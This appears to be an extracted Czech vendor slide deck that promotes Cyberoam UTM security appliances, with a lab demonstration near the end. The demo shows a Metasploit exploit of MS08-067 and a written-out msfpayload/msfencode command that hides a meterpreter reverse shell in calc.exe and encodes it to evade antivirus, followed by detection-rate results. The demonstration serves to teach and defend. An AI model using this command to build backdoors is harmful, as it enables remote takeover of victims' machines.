Kliknutím lze upravit styl. Popis konference + datum Bezpečnostní řešení Alternetivo Michal (dolejsi@alternetivo.cz) Petr (cechura@alternetivo.cz)
Proč UTM? Syndrom mě se to stát nemůže? Doba se mění a zranitelnosti jsou všude OS, firewall, webové aplikace, souborové systémy, bot net, spam, D/DoS IT administrátoři však - zdá se - nezaostávají:
Proč UTM? Spravovat více dílčích řešení je náročné (finančně, časově, administrativně, ) Když dva dělají totéž, není to totéž! Složitost síťové topologie Více zařízení od více výrobců Nunto znát více konfiguračních rozhraní - školení Vyšší cena CapEX a OpEX Rozdílné dílčí logování a reportování
Kdo je Cyberoam? Založeno 1999 Více než 550 zaměstnanců celosvětově Únor 2014 kupuje Cyberoam majoritní investor konkurenta Sohpos a společnosti se prezentují jako partneři, prodejní kanály se nemění Působnost ve více než 125 zemích světa Mezi TOP 3 hráči na poli UTM pobočky v USA, Indii a na Středním východě
2013 Magic Quadrant for Unified Threat Management 2014: Sophos & Cyberoam
Portfolio Cyberoam UTM UTM zařízení Pobočky, menší společnosti CR35wiNG, CR35iNG, CR25wiNG, CR25iNG, CR15wiNG, CR15iNG Malé a střední společnosti CR300iNG, CR200iNG, CR100iNG, CR50iNG Virtuální UTM CRiV-1C, CRiV-2C, CRiV-4C, CRiV-8C, CRiV-12C Velké společnosti (NG FW) CR2500iNG CR1500iNG CR1000iNG CR750iNG CR500iNG
Co to sakra??? L8 security Patentovaná technologie Cyberoam L8 vkládá uživatelskou identitu jako 8. vrstvu ISO/OSI modelu Cyberoam UTM poskytují komplexní zabezpečení od L2 do L7 svázené s uživatelskou identitou.
UTM funkce Layer 8 security Support for 3G/4G/WiMax
Cyberoam Live Demo odkaz: http://demo.cyberoam.com přístupové údaje: guest /guest Možno získat 30-ti dení testovací Trial CR virtual appliance
SI Firewall klíčová myšlenka Identita + Bezpečnost + Produktivita + Konektivita
Intrusion Prevention System Vlastní výrobek (Signatury píše přímo Cyberoam) 4500+ signatur, IPS tuning IPS politiky lze vztáhnout na uživatele, skupinu, IP adresy, atd.. možnost definice více IPS politik Lze vytvářet vlastní IPS signatury identity-based alarmy & reporty Automatické aktualizace v reálném čase HTTP Proxy signatury Základní ochrana před DoS a DDoS útoky (treshold)
GW Antivirus & AntiSpyware 4 milliony+ signatur Poskytovatel AV enginu: Avira obousměrný sken: Web & Email virová karanténa skenuje HTTP, FTP, SMTP, POP3, HTTPS, IMAP a IM provoz Aktualizace signatur každou půlhodinu
GW Antispam Inbound/Outbound tři úrovně skenování: IP reputace Real-time Blackhole List Recurrent Pattern Detection ~98% úspěšnost detekce spamu karanténa a Spam Digest skenuje SMTP, POP3, IMAP
Web Application Firewall Firewally/IPS nejsou schopny ochránit webové aplikace před neznámými hrozbami Tradiční FW Blokování neautorizovaného přístupu Cyberoam UTM s WAF ochranou WAF ochrana na Cyberoam UTM Webový & chrání webové aplikace a webové aplikační servery před útočníkydatabázový server bez signatur (tzn. bez aktualizací) server intuitivní detektor toku (automatické přizpůsobení změn na stránce) ochrana proti zranitelnostem definovaných OWASP top 10 SSL Offloading monitoring & reporting Síť organizace Finanční úspory není nutné kupovat dedikovaný HW pro WAF Jednoduchost nasazení Nevyžaduje změny ve stávajícím nastavení
Virtual Private Network (VPN) Podpora: IPSec, L2TP, PPTP, SSL VPN Threat Free Tunneling (TFT) - skenování provozu ve VPN na malware, spam, nevhodný obsah, útoky Rozšířené možnosti - Failover: MPLS - VPN - Failover: VPN - VPN SSL VPN - client/clientless - zdarma Podpora mobilních VPN klientů Podporované platformy MacOS ios Android ios IPSec VPN L2TP VPN PPTP VPN Android L2TP VPN
Logování a reporting Klíčová výhoda: integrovaný reporting založený na identitě uživatele Reporty jsou ukládané na interní HDD cyberoam pro logy & reporting používá nástroj iview reporty jsou dostupné: tabulkový (XLS), PDF, on appliance L8 komplexní reporty: web surfing report, antivirus & antispam report, IDS a IPS reporty, Data transfer report, web trend report, compliance reporty a reporty sloužící pro firemní audity UTM Device Software / Device
Reporty
Reporty
Reporty
Aplikační reporty
Licenční politika Součástí UTM je zdarma AAA L8 SI firewall SSL/IPSec VPN, (SSL VPN klient zdarma) Management šířky pásma/qos Routing Logování a reportování Multi link management Licence lze kupovat na období 1/2/3 roky + lze je prodlužovat
Licenční politika Balíčky licencí (úspora financí) Total Value Subscription (TVS) Security Value Subscription (SVS) Complete Value Subscription (CVS) Antivirus a antispam Balíčky jsou ještě ve verzích PLUS = support je 24x7 Balíčky Jednotlivé licence SVS SVSP TVS TVSP CVS Gateway Anti-Virus Webový a aplikační filtr Intrusion Prevention Systém Gateway Anti-Spam Web Application Firewall Outbound Anti-Spam 8x5 support 24x7 support
Virtuální Realita
Bezpečnostní výzvy skenování InterVM provozu nelze provést skenování provozu mezi VM s externím bezpečnostním řešením jediná kompromitovaná VM může ovlivnit své okolí Riskujeme útoky cílené na: Hypervisor management console Hypervisor & hostovský OS Potřeba řešení bezpečnosti ve virtuálním prostředí Exploitace virtualizovaných web-aplikací hackery Ochrana virtuálních serverů proti průniku Řízení uživatelského přístupu vazba mezi přístupem ke službám a využití sítě s uživatelskou identitou Bezpečnostní HW nemůže nabídnout inline ochranu toky jsou neviditelné; vytvoření slepých míst v síti nelze provádět forenzní analýzu
Cyberoam virtuální appliance virtuální rovina skenuje definovaný provoz ve virtuálním prostředí VM1 Apps Windows OS VM2 Apps Linux OS Hypervisor Hardware VM3 Apps jiný OS Bezpečnostní aspekty SI firewall IPS Antivirus Anti-spyware & Anti-spam Webová filtrace Řízení aplikací Web Application Firewall (WAF) Cyberoam Virtual UTM appliance Virtual Private Network Logging & Reporting L8 bezpečnost založená na identitě
Cyberoam Virtual UTM - modely Model CRiV-1C CRiV-2C CRiV-4C CRiV-8C CRiV-12C Licencování nejvýše 1vCPU nejvýše 2vCPU nejvýše 4vCPU nejvýše 8vCPU nejvýše 12vCPU Získejte 30 denní FREE demo Cyberoam Virtual appliance
Realita?
Realita je vlastně hrozně jednoduchá Michal Dolejší
Intrusion Prevention System Vlastní výrobek (Signatury píše přímo Cyberoam) 4500+ signatur, IPS tuning IPS politiky lze vztáhnout na uživatele, skupinu, IP adresy, atd.. možnost definice více IPS politik Lze vytvářet vlastní IPS signatury identity-based alarmy & reporty Automatické aktualizace v reálném čase HTTP Proxy signatury Základní ochrana před DoS a DDoS útoky (treshold)
Praktická ukázka Heartbleed bug veškeré aktuální oficiální SW nejsou tímto bugem ohroženy problematické jsou pouze beta release: 10.6.0 Beta-3 10.6.1 RC-1 10.6.1 RC-3 12.4. 2014 byl pro tyto verze vydán fix 10.6.1 RC-4 současně s tímto byla vydána IP signatura (v3.11.61,v5.11.61) OpenSSL TLS DTLS Heartbeat Information Disclosure
Praktická ukázka Schéma topologie virtuální infrastruktury KALI linux 10.10.1.10 WAN 10.77.77.0/24 vswitch DMZ DMZ 10.10.1.10/24 vsphere Client vswitch VM network (default) Cyberoam vutm vswitch LAN LAN 172.16.16.0/24 Windows XP SP3 172.16.16.100 Windows 7 SP1 172.16.16.101
Praktická ukázka Praktická ukázka Co je Metasploit Framework? Nástroj pro vývoj a testování zranitelností systému nebo aplikací Vznikl v roce 2003 a byl převzat společností Rapid7 Napsán v jazyce Ruby Podporován jak pro Windows, tak i linux Základní terminologie Vulnerability slabé místo, které umožňuje útočníkovi překonat zabezpečení systému Exploit kód, který umožňuje využít zranitelnosti systému Payload kód, který je spuštěn na systému po jeho exploitaci
Praktická ukázka Ukázka zranitelnosti MS08_67 pro WinXP Útočník, který by tuto chybu úspěšně zneužil, by mohl vzdáleně převzít úplnou kontrolu nad ohroženým systémem. V počítačích se systémem Microsoft Windows 2000, Windows XP a Windows Server 2003 by útočník mohl této chyby zneužít prostřednictvím protokolu RPC bez ověřování a mohl by spustit libovolný kód. Pokud se pokus o zneužití nezdaří, může dojít k chybě v souboru Svchost.exe, která ovlivní službu Server. Služba Server poskytuje sdílení souborů, tisku a pojmenovaných kanálů v síti. Chyba je způsobena službou Server, která správně nezpracovává speciálně vytvořené požadavky RPC. Prevence MS08_067:Security Update pro Windows XP (KB958644) Používejte IPS (např. v Cyberoamu )
Praktická ukázka Ukázka vytvoření backdooru pro Win7 Na systému je: zapnutý integrovaný FW nainstalována aktualizovaná bezplatná verze Antiviru (konkrétně AVG 2014 free) Pro vytvoření backdooru ve stávajícím spustitelném exe souboru použijeme funkcionality msfpayload a msfencode msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.1.10 R msfencode -t exe -x calc.exe -o calc_new.exe -e x86/shikata_ga_nai -c 4 -k Následně na MSF spustíme handler a čekáme na příchozí připojení Prevence Nestahujte aplikace/dokumenty z neověřených zdrojů Používejte IPS (např. v Cyberoamu )
Praktická ukázka Hromadné srovnání účinnosti antivirů vliv počtu iterací encoderu na výsledek analýzy Antivirem scan realizován dne 10.4. 2014 (virustotal.com) 45 počet iterací enkoderu úspěšnost detekce 0 35/16 4 12/39 20 9/42 40 35 30 25 20 15 10 5 detekovano nedetekovano 0 0 4 20
Závěrem Hardware / cloud L8 security Flexibilita Poměr cena/výkon na výborné úrovni Referenční model zabezpečení není výhra